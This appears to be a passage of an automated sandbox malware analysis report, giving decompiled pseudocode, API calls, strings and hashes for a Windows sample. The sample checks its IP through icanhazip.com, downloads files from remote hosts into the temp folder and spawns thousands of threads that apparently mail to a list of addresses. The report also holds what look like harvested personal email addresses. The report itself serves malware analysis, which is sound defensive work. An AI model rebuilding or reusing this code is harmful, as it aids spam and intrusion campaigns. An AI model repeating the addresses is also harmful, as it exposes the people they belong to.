                                                                                                                                                                                                                                                                                    					while(_v2364 < 0xbb8) {
                                                                                                                                                                                                                                                                                    						CreateThread(0, 0, E00EA2280, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    						_t88 = rand();
                                                                                                                                                                                                                                                                                    						asm("cdq");
                                                                                                                                                                                                                                                                                    						Sleep(_t88 % 0x32 + 0x32); // executed
                                                                                                                                                                                                                                                                                    						_v2364 = _v2364 + 1;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					DeleteFileW("C:\Users\Albus\AppData\Local\Temp\29997219412047.jpg");
                                                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                                                    					_t85 = atoi(E00EA18D0(0,  &_v1052, 0));
                                                                                                                                                                                                                                                                                    					_t134 = _t139 + 0x10;
                                                                                                                                                                                                                                                                                    					_v2360 = _t85;
                                                                                                                                                                                                                                                                                    					if(_v2360 >= 1) {
                                                                                                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					ExitProcess(0);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}
























                                                                                                                                                                                                                                                                                    0x00ea23c9
                                                                                                                                                                                                                                                                                    0x00ea23d2
                                                                                                                                                                                                                                                                                    0x00ea23e8
                                                                                                                                                                                                                                                                                    0x00ea23fe
                                                                                                                                                                                                                                                                                    0x00ea2414
                                                                                                                                                                                                                                                                                    0x00ea242a
                                                                                                                                                                                                                                                                                    0x00ea243e
                                                                                                                                                                                                                                                                                    0x00ea2446
                                                                                                                                                                                                                                                                                    0x00ea2451
                                                                                                                                                                                                                                                                                    0x00ea246a
                                                                                                                                                                                                                                                                                    0x00ea2483
                                                                                                                                                                                                                                                                                    0x00ea249e
                                                                                                                                                                                                                                                                                    0x00ea24b2
                                                                                                                                                                                                                                                                                    0x00ea24bb
                                                                                                                                                                                                                                                                                    0x00ea24c0
                                                                                                                                                                                                                                                                                    0x00ea24c3
                                                                                                                                                                                                                                                                                    0x00ea24d0
                                                                                                                                                                                                                                                                                    0x00ea264c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea24d6
                                                                                                                                                                                                                                                                                    0x00ea24d6
                                                                                                                                                                                                                                                                                    0x00ea24db
                                                                                                                                                                                                                                                                                    0x00ea24ef
                                                                                                                                                                                                                                                                                    0x00ea2503
                                                                                                                                                                                                                                                                                    0x00ea250b
                                                                                                                                                                                                                                                                                    0x00ea2510
                                                                                                                                                                                                                                                                                    0x00ea252e
                                                                                                                                                                                                                                                                                    0x00ea2537
                                                                                                                                                                                                                                                                                    0x00ea253c
                                                                                                                                                                                                                                                                                    0x00ea254b
                                                                                                                                                                                                                                                                                    0x00ea2550
                                                                                                                                                                                                                                                                                    0x00ea255f
                                                                                                                                                                                                                                                                                    0x00ea2564
                                                                                                                                                                                                                                                                                    0x00ea2584
                                                                                                                                                                                                                                                                                    0x00ea259b
                                                                                                                                                                                                                                                                                    0x00ea25a0
                                                                                                                                                                                                                                                                                    0x00ea25a8
                                                                                                                                                                                                                                                                                    0x00ea25b0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea25b2
                                                                                                                                                                                                                                                                                    0x00ea25cd
                                                                                                                                                                                                                                                                                    0x00ea25e8
                                                                                                                                                                                                                                                                                    0x00ea25ee
                                                                                                                                                                                                                                                                                    0x00ea25f3
                                                                                                                                                                                                                                                                                    0x00ea25ff
                                                                                                                                                                                                                                                                                    0x00ea25c7
                                                                                                                                                                                                                                                                                    0x00ea25c7
                                                                                                                                                                                                                                                                                    0x00ea260c
                                                                                                                                                                                                                                                                                    0x00ea2612
                                                                                                                                                                                                                                                                                    0x00ea2626
                                                                                                                                                                                                                                                                                    0x00ea262b
                                                                                                                                                                                                                                                                                    0x00ea262e
                                                                                                                                                                                                                                                                                    0x00ea263b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea2645
                                                                                                                                                                                                                                                                                    0x00ea263f
                                                                                                                                                                                                                                                                                    0x00ea263f

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00EA23CB
                                                                                                                                                                                                                                                                                    • srand.MSVCR90 ref: 00EA23D2
                                                                                                                                                                                                                                                                                    • _wmemset.LIBCPMTD ref: 00EA23E8
                                                                                                                                                                                                                                                                                    • _wmemset.LIBCPMTD ref: 00EA23FE
                                                                                                                                                                                                                                                                                    • _wmemset.LIBCPMTD ref: 00EA2414
                                                                                                                                                                                                                                                                                    • _wmemset.LIBCPMTD ref: 00EA242A
                                                                                                                                                                                                                                                                                    • memset.MSVCR90 ref: 00EA243E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA17D0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00EA17E3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA17D0: InternetOpenUrlA.WININET(00000000,http://icanhazip.com/,00000000,00000000,00000000,00000000), ref: 00EA1807
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA17D0: InternetReadFile.WININET(00000000,?,00000063,?), ref: 00EA1824
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA17D0: wsprintfA.USER32 ref: 00EA1860
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA17D0: InternetCloseHandle.WININET(00000000), ref: 00EA1882
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA17D0: InternetCloseHandle.WININET(?), ref: 00EA18A1
                                                                                                                                                                                                                                                                                    • strcpy.MSVCR90([102.129.143.99],00000000), ref: 00EA2451
                                                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 00EA246A
                                                                                                                                                                                                                                                                                    • mbstowcs.MSVCR90 ref: 00EA2483
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00EA249E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA18D0: memset.MSVCR90 ref: 00EA18E2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA18D0: InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000001,00000000,00000000,00000000), ref: 00EA18F7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA18D0: InternetOpenUrlW.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA191A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA18D0: CreateFileW.KERNELBASE(00EA24B7,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00EA1949
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA18D0: InternetReadFile.WININET(00000000,ight0@gmail.comviktorija.pozingyte@gmail.comkjgnebre@yahoo.commanikat1@hotmail.comewilliams.mba2004@london.edusyasha93@gmail.commohit_nj@yahoo.comshyam_1224@yahoo.inagervej19@gmail.comradwad2002@yahoo.co.ukedenjakota@hotmail.comakbar78678@gmail.com,000003FF,00EA24B7), ref: 00EA196A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA18D0: WriteFile.KERNELBASE(000000FF,ight0@gmail.comviktorija.pozingyte@gmail.comkjgnebre@yahoo.commanikat1@hotmail.comewilliams.mba2004@london.edusyasha93@gmail.commohit_nj@yahoo.comshyam_1224@yahoo.inagervej19@gmail.comradwad2002@yahoo.co.ukedenjakota@hotmail.comakbar78678@gmail.com,00000000,00000000,00000000), ref: 00EA198D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA18D0: CloseHandle.KERNEL32(000000FF), ref: 00EA1999
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA18D0: InternetCloseHandle.WININET(00000000), ref: 00EA19BD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA18D0: InternetCloseHandle.WININET(00000000), ref: 00EA19C7
                                                                                                                                                                                                                                                                                    • atoi.MSVCR90 ref: 00EA24BB
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(000003E8), ref: 00EA24DB
                                                                                                                                                                                                                                                                                    • _wmemset.LIBCPMTD ref: 00EA24EF
                                                                                                                                                                                                                                                                                    • _wmemset.LIBCPMTD ref: 00EA2503
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 00EA250B
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00EA252E
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 00EA2537
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 00EA254B
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 00EA255F
                                                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 00EA2584
                                                                                                                                                                                                                                                                                      • Part of subcall function 00EA18D0: InternetReadFile.WININET(00000000,ight0@gmail.comviktorija.pozingyte@gmail.comkjgnebre@yahoo.commanikat1@hotmail.comewilliams.mba2004@london.edusyasha93@gmail.commohit_nj@yahoo.comshyam_1224@yahoo.inagervej19@gmail.comradwad2002@yahoo.co.ukedenjakota@hotmail.comakbar78678@gmail.com,000003FF,00EA24B7), ref: 00EA19B3
                                                                                                                                                                                                                                                                                    • PathFileExistsW.SHLWAPI(C:\Users\user\AppData\Local\Temp\29997219412047.jpg), ref: 00EA25A8
                                                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,00EA2280,00000000,00000000,00000000), ref: 00EA25E8
                                                                                                                                                                                                                                                                                    • rand.MSVCR90 ref: 00EA25EE
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE ref: 00EA25FF
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\29997219412047.jpg), ref: 00EA260C
                                                                                                                                                                                                                                                                                    • atoi.MSVCR90 ref: 00EA2626
                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00EA263F
                                                                                                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 00EA264C
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$File$_wmemset$CloseHandlerand$Openwsprintf$Read$CreateExitSleepThreadatoimemset$CountDeleteEnvironmentExistsExpandPathProcessStringsTickWritembstowcssrandstrcpy
                                                                                                                                                                                                                                                                                    • String ID: %s%d.txt$%s\%d%d%d.jpg$%sn.txt$%temp%$C:\Users\user\AppData\Local\Temp\29997219412047.jpg$[102.129.143.99]
                                                                                                                                                                                                                                                                                    • API String ID: 3135460431-2601120357
                                                                                                                                                                                                                                                                                    • Opcode ID: 2ef66567bd836e082f0fc1d971a45d15dac50a1b2dca4a5bb5b6f9d77558d845
                                                                                                                                                                                                                                                                                    • Instruction ID: a156a2fad1a87ed7a9a342f71caad27d89e645e53e2b7d8bc7e4fc83625db845
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ef66567bd836e082f0fc1d971a45d15dac50a1b2dca4a5bb5b6f9d77558d845
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4C51F8F5D41304ABE714A764DC47FD93279AB9E705F0450A9F3097D0C2EAF477848A62
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 158 ea18d0-ea1904 memset InternetOpenW 159 ea190a-ea1927 InternetOpenUrlW 158->159 160 ea19c3-ea19d5 InternetCloseHandle 158->160 161 ea19b9-ea19bd InternetCloseHandle 159->161 162 ea192d-ea1934 159->162 161->160 163 ea19a1-ea19b3 InternetReadFile 162->163 164 ea1936-ea1956 CreateFileW 162->164 163->161 165 ea1958-ea1972 InternetReadFile 164->165 166 ea199f 164->166 167 ea1974-ea1978 165->167 168 ea1995-ea1999 CloseHandle 165->168 166->161 167->168 169 ea197a-ea1993 WriteFile 167->169 168->166 169->165
                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00EA18D0(signed char _a4, WCHAR* _a8, WCHAR* _a12) {
                                                                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				long _v16;
                                                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				memset("ight0@gmail.comviktorija.pozingyte@gmail.comkjgnebre@yahoo.commanikat1@hotmail.comewilliams.mba2004@london.edusyasha93@gmail.commohit_nj@yahoo.comshyam_1224@yahoo.inagervej19@gmail.comradwad2002@yahoo.co.ukedenjakota@hotmail.comakbar78678@gmail.com", 0, 0x400);
                                                                                                                                                                                                                                                                                    				_t23 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36", 1, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    				_v24 = _t23;
                                                                                                                                                                                                                                                                                    				if(_v24 != 0) {
                                                                                                                                                                                                                                                                                    					_t27 = InternetOpenUrlW(_v24, _a8, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                                    					_v8 = _t27;
                                                                                                                                                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    						if((_a4 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                    							InternetReadFile(_v8, "ight0@gmail.comviktorija.pozingyte@gmail.comkjgnebre@yahoo.commanikat1@hotmail.comewilliams.mba2004@london.edusyasha93@gmail.commohit_nj@yahoo.comshyam_1224@yahoo.inagervej19@gmail.comradwad2002@yahoo.co.ukedenjakota@hotmail.comakbar78678@gmail.com", 0x3ff,  &_v20); // executed
                                                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                                                    							_t32 = CreateFileW(_a12, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                                                                                                                                                    							_v12 = _t32;
                                                                                                                                                                                                                                                                                    							if(_v12 != 0xffffffff) {
                                                                                                                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                                                                                                                    									_t33 = InternetReadFile(_v8, "ight0@gmail.comviktorija.pozingyte@gmail.comkjgnebre@yahoo.commanikat1@hotmail.comewilliams.mba2004@london.edusyasha93@gmail.commohit_nj@yahoo.comshyam_1224@yahoo.inagervej19@gmail.comradwad2002@yahoo.co.ukedenjakota@hotmail.comakbar78678@gmail.com", 0x3ff,  &_v20); // executed
                                                                                                                                                                                                                                                                                    									if(_t33 == 0 || _v20 == 0) {
                                                                                                                                                                                                                                                                                    										break;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									WriteFile(_v12, "ight0@gmail.comviktorija.pozingyte@gmail.comkjgnebre@yahoo.commanikat1@hotmail.comewilliams.mba2004@london.edusyasha93@gmail.commohit_nj@yahoo.comshyam_1224@yahoo.inagervej19@gmail.comradwad2002@yahoo.co.ukedenjakota@hotmail.comakbar78678@gmail.com", _v20,  &_v16, 0); // executed
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								CloseHandle(_v12);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					InternetCloseHandle(_v8); // executed
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				InternetCloseHandle(_v24);
                                                                                                                                                                                                                                                                                    				return 0xea6120;
                                                                                                                                                                                                                                                                                    			}












                                                                                                                                                                                                                                                                                    0x00ea18e2
                                                                                                                                                                                                                                                                                    0x00ea18f7
                                                                                                                                                                                                                                                                                    0x00ea18fd
                                                                                                                                                                                                                                                                                    0x00ea1904
                                                                                                                                                                                                                                                                                    0x00ea191a
                                                                                                                                                                                                                                                                                    0x00ea1920
                                                                                                                                                                                                                                                                                    0x00ea1927
                                                                                                                                                                                                                                                                                    0x00ea1934
                                                                                                                                                                                                                                                                                    0x00ea19b3
                                                                                                                                                                                                                                                                                    0x00ea1936
                                                                                                                                                                                                                                                                                    0x00ea1949
                                                                                                                                                                                                                                                                                    0x00ea194f
                                                                                                                                                                                                                                                                                    0x00ea1956
                                                                                                                                                                                                                                                                                    0x00ea1958
                                                                                                                                                                                                                                                                                    0x00ea196a
                                                                                                                                                                                                                                                                                    0x00ea1972
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea198d
                                                                                                                                                                                                                                                                                    0x00ea198d
                                                                                                                                                                                                                                                                                    0x00ea1999
                                                                                                                                                                                                                                                                                    0x00ea1999
                                                                                                                                                                                                                                                                                    0x00ea199f
                                                                                                                                                                                                                                                                                    0x00ea1934
                                                                                                                                                                                                                                                                                    0x00ea19bd
                                                                                                                                                                                                                                                                                    0x00ea19bd
                                                                                                                                                                                                                                                                                    0x00ea19c7
                                                                                                                                                                                                                                                                                    0x00ea19d5

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • memset.MSVCR90 ref: 00EA18E2
                                                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36,00000001,00000000,00000000,00000000), ref: 00EA18F7
                                                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00EA191A
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(00EA24B7,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00EA1949
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,ight0@gmail.comviktorija.pozingyte@gmail.comkjgnebre@yahoo.commanikat1@hotmail.comewilliams.mba2004@london.edusyasha93@gmail.commohit_nj@yahoo.comshyam_1224@yahoo.inagervej19@gmail.comradwad2002@yahoo.co.ukedenjakota@hotmail.comakbar78678@gmail.com,000003FF,00EA24B7), ref: 00EA196A
                                                                                                                                                                                                                                                                                    • WriteFile.KERNELBASE(000000FF,ight0@gmail.comviktorija.pozingyte@gmail.comkjgnebre@yahoo.commanikat1@hotmail.comewilliams.mba2004@london.edusyasha93@gmail.commohit_nj@yahoo.comshyam_1224@yahoo.inagervej19@gmail.comradwad2002@yahoo.co.ukedenjakota@hotmail.comakbar78678@gmail.com,00000000,00000000,00000000), ref: 00EA198D
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 00EA1999
                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,ight0@gmail.comviktorija.pozingyte@gmail.comkjgnebre@yahoo.commanikat1@hotmail.comewilliams.mba2004@london.edusyasha93@gmail.commohit_nj@yahoo.comshyam_1224@yahoo.inagervej19@gmail.comradwad2002@yahoo.co.ukedenjakota@hotmail.comakbar78678@gmail.com,000003FF,00EA24B7), ref: 00EA19B3
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00EA19BD
                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00EA19C7
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36, xrefs: 00EA18F2
                                                                                                                                                                                                                                                                                    • ight0@gmail.comviktorija.pozingyte@gmail.comkjgnebre@yahoo.commanikat1@hotmail.comewilliams.mba2004@london.edusyasha93@gmail.commohit_nj@yahoo.comshyam_1224@yahoo.inagervej19@gmail.comradwad2002@yahoo.co.ukedenjakota@hotmail.comakbar78678@gmail.com, xrefs: 00EA18DD, 00EA1961, 00EA1984, 00EA19AA, 00EA19CD
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.892724043.0000000000EA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892708963.0000000000EA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892732980.0000000000EA4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892759245.0000000000EA6000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.892764370.0000000000EA7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_ea0000_1925824589.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Internet$File$CloseHandle$OpenRead$CreateWritememset
                                                                                                                                                                                                                                                                                    • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36$ight0@gmail.comviktorija.pozingyte@gmail.comkjgnebre@yahoo.commanikat1@hotmail.comewilliams.mba2004@london.edusyasha93@gmail.commohit_nj@yahoo.comshyam_1224@yahoo.inagervej19@gmail.comradwad2002@yahoo.co.ukedenjakota@hotmail.comakbar78678@gmail.com
                                                                                                                                                                                                                                                                                    • API String ID: 4022733741-1907809196
                                                                                                                                                                                                                                                                                    • Opcode ID: dec573f71798e3428039294bf831fa5d4a060ffa625b430a2e6bc1cd7690820c
                                                                                                                                                                                                                                                                                    • Instruction ID: 4a369acc62915e8df5050c25616b5c28fd5f44e9908311c9941a8f9b800e8388
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dec573f71798e3428039294bf831fa5d4a060ffa625b430a2e6bc1cd7690820c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 86313CB0A40308BFEB10DBA0DC5AFAF7B78AB9E701F205154B6117A1D0D7B0BA44CB51
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                    control_flow_graph 170 ea2280-ea22b7 GetTickCount srand _wfopen 171 ea22bd 170->171 172 ea2346-ea236b call ea1400 call ea18b0 170->172 174 ea22c7-ea22e4 fgets 171->174 182 ea2399-ea239b ExitThread 172->182 183 ea236d-ea2383 call ea18b0 172->183 176 ea22e6-ea231d rand 174->176 177 ea2337-ea2343 fclose 174->177 178 ea231f-ea2332 strcpy 176->178 179 ea2335 176->179 177->172 178->179 179->174 183->182 186 ea2385-ea2391 call ea19e0 183->186 188 ea2396 186->188 188->182
                                                                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                    			E00EA2280() {
                                                                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                                                                    				char _v532;
                                                                                                                                                                                                                                                                                    				struct _IO_FILE* _v536;
                                                                                                                                                                                                                                                                                    				long _v540;
                                                                                                                                                                                                                                                                                    				signed char _v544;
                                                                                                                                                                                                                                                                                    				int _t18;
                                                                                                                                                                                                                                                                                    				char* _t26;
                                                                                                                                                                                                                                                                                    				signed char _t28;
                                                                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                                                                    				signed long long _t48;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t18 = GetTickCount();
                                                                                                                                                                                                                                                                                    				srand(_t18);
                                                                                                                                                                                                                                                                                    				_push("r");
                                                                                                                                                                                                                                                                                    				_push("C:\Users\Albus\AppData\Local\Temp\29997219412047.jpg"); // executed
                                                                                                                                                                                                                                                                                    				L00EA27F0(); // executed
                                                                                                                                                                                                                                                                                    				_t40 = _t38 + 0xc;
                                                                                                                                                                                                                                                                                    				_v536 = _t18;
                                                                                                                                                                                                                                                                                    				if(_v536 == 0) {
                                                                                                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                                                                                                    					E00EA1400( &_v532);
                                                                                                                                                                                                                                                                                    					if(E00EA18B0( &_v532, "@") != 0 && E00EA18B0( &_v532, ".") != 0) {
                                                                                                                                                                                                                                                                                    						_push(0xea442e);
                                                                                                                                                                                                                                                                                    						E00EA19E0( &_v532); // executed
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					ExitThread(0);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_v540 = 0;
                                                                                                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                                                                                                    					_t26 = fgets( &_v268, 0x104, _v536); // executed
                                                                                                                                                                                                                                                                                    					_t40 = _t40 + 0xc;
                                                                                                                                                                                                                                                                                    					if(_t26 == 0) {
                                                                                                                                                                                                                                                                                    						break;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_v540 = _v540 + 1;
                                                                                                                                                                                                                                                                                    					_t28 = rand();
                                                                                                                                                                                                                                                                                    					_v544 = _t28;
                                                                                                                                                                                                                                                                                    					asm("fild dword [ebp-0x21c]");
                                                                                                                                                                                                                                                                                    					_t48 = _t48 /  *0xea4d00;
                                                                                                                                                                                                                                                                                    					asm("fild dword [ebp-0x218]");
                                                                                                                                                                                                                                                                                    					asm("fld1");
                                                                                                                                                                                                                                                                                    					asm("fdivrp st1, st0");
                                                                                                                                                                                                                                                                                    					asm("fcompp");
                                                                                                                                                                                                                                                                                    					asm("fnstsw ax");
                                                                                                                                                                                                                                                                                    					if((_t28 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                    						strcpy( &_v532,  &_v268);
                                                                                                                                                                                                                                                                                    						_t40 = _t40 + 8;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				fclose(_v536);
                                                                                                                                                                                                                                                                                    				_t40 = _t40 + 4;
                                                                                                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                                                                                                    			}














                                                                                                                                                                                                                                                                                    0x00ea2289
                                                                                                                                                                                                                                                                                    0x00ea2290
                                                                                                                                                                                                                                                                                    0x00ea2298
                                                                                                                                                                                                                                                                                    0x00ea229d
                                                                                                                                                                                                                                                                                    0x00ea22a2
                                                                                                                                                                                                                                                                                    0x00ea22a7
                                                                                                                                                                                                                                                                                    0x00ea22aa
                                                                                                                                                                                                                                                                                    0x00ea22b7
                                                                                                                                                                                                                                                                                    0x00ea2346
                                                                                                                                                                                                                                                                                    0x00ea234d
                                                                                                                                                                                                                                                                                    0x00ea236b
                                                                                                                                                                                                                                                                                    0x00ea2385
                                                                                                                                                                                                                                                                                    0x00ea2391
                                                                                                                                                                                                                                                                                    0x00ea2396
                                                                                                                                                                                                                                                                                    0x00ea239b
                                                                                                                                                                                                                                                                                    0x00ea239b
                                                                                                                                                                                                                                                                                    0x00ea22bd
                                                                                                                                                                                                                                                                                    0x00ea22c7
                                                                                                                                                                                                                                                                                    0x00ea22da
                                                                                                                                                                                                                                                                                    0x00ea22df
                                                                                                                                                                                                                                                                                    0x00ea22e4
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00ea22ef
                                                                                                                                                                                                                                                                                    0x00ea22f5
                                                                                                                                                                                                                                                                                    0x00ea22fa
                                                                                                                                                                                                                                                                                    0x00ea2300
                                                                                                                                                                                                                                                                                    0x00ea2306
                                                                                                                                                                                                                                                                                    0x00ea230c
                                                                                                                                                                                                                                                                                    0x00ea2312
                                                                                                                                                                                                                                                                                    0x00ea2314
                                                                                                                                                                                                                                                                                    0x00ea2316
                                                                                                                                                                                                                                                                                    0x00ea2318
                                                                                                                                                                                                                                                                                    0x00ea231d
